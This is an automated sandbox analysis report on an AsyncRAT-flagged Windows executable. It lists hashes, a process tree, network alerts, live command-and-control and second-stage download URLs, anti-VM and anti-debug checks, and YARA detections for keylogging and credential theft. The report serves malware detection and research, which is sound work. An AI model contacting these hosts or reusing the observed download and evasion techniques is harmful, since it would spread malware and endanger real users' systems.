Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 27, 2021, 8:15 a.m.	Sept. 27, 2021, 8:19 a.m.

Size	774.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`856543b98724304b70a2224a975b8760`
SHA256	`ba319ab5c744553d08d3e981e76445631626be828e08bfa84487ae19434912b9`
CRC32	`DE395472`
ssdeep	`24576:kNSDqhcQfj7xDq2N+4uF6I8QsaOXA/n3:ocg92R9F92XA/`
PDB Path	C:\Users\Alexx\Desktop\SetDerict.pdb
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description)

Stub.exe "C:\Users\test22\AppData\Local\Temp\Stub.exe"
1908
- cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat"
  2740
  - chcp.com chcp 65001
    2232
  - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    2312
  - smss.exe "C:\Sandbox\test22\smss.exe"
    2624

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
176.31.32.199	Active	Moloch
62.109.1.30	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49210 -> 176.31.32.199:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 176.31.32.199:80 -> 192.168.56.101:49210	2014819	ET INFO Packed Executable Download	Misc activity
TCP 176.31.32.199:80 -> 192.168.56.101:49210	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.31.32.199:80 -> 192.168.56.101:49210	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.31.32.199:80 -> 192.168.56.101:49210	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:15 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 27, 2021, 8:16 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 27, 2021, 8:15 a.m.			0	0
IsDebuggerPresent Sept. 27, 2021, 8:15 a.m.			0	0
IsDebuggerPresent Sept. 27, 2021, 8:15 a.m.			0	0
IsDebuggerPresent Sept. 27, 2021, 8:15 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 27, 2021, 8:15 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1	0
WriteConsoleW Sept. 27, 2021, 8:15 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1	0

Uses Windows APIs to generate a cryptographic key (21 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000522b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000522bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000522bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000522fe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000005230c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000005237c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001af27bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001af7af30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002b65e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002b65e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:15 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002b65e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a853930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a853a10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a854110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8543b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8543b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a854420 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8545e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8547a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8ed5b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Sept. 27, 2021, 8:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001a8eda10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\Users\Alexx\Desktop\SetDerict.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 27, 2021, 8:15 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://62.109.1.30/triggers/vm_.php?mICvfro6PEXVDXrLSnC2C=s6yb&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=gZlFWOwQDMhlTO2kjZ2QjN4MmNiRWZ3UmZyIGZxYTM0QjMxITZmhTY&mICvfro6PEXVDXrLSnC2C=s6yb
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://176.31.32.199/DriverGraphDevicea.exe

Performs some HTTP requests (2 events)

request	GET http://62.109.1.30/triggers/vm_.php?mICvfro6PEXVDXrLSnC2C=s6yb&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=gZlFWOwQDMhlTO2kjZ2QjN4MmNiRWZ3UmZyIGZxYTM0QjMxITZmhTY&mICvfro6PEXVDXrLSnC2C=s6yb
request	GET http://176.31.32.199/DriverGraphDevicea.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 235 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 2490368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002220000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002400000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91d02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 27, 2021, 8:15 a.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 27, 2021, 8:15 a.m.	total_number_of_free_bytes: 13724983296 free_bytes_available: 13724983296 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW Sept. 27, 2021, 8:16 a.m.	total_number_of_free_bytes: 13720530944 free_bytes_available: 13720530944 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\DriverGraphDevicea.exe
file	C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 27, 2021, 8:15 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\oezDT0taNW.bat	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 27, 2021, 8:16 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 27, 2021, 8:15 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 27, 2021, 8:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (30 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

chcp 65001

Communicates with host for which no DNS query was performed (2 events)

host	176.31.32.199
host	62.109.1.30

Installs itself for autorun at Windows startup (15 events)

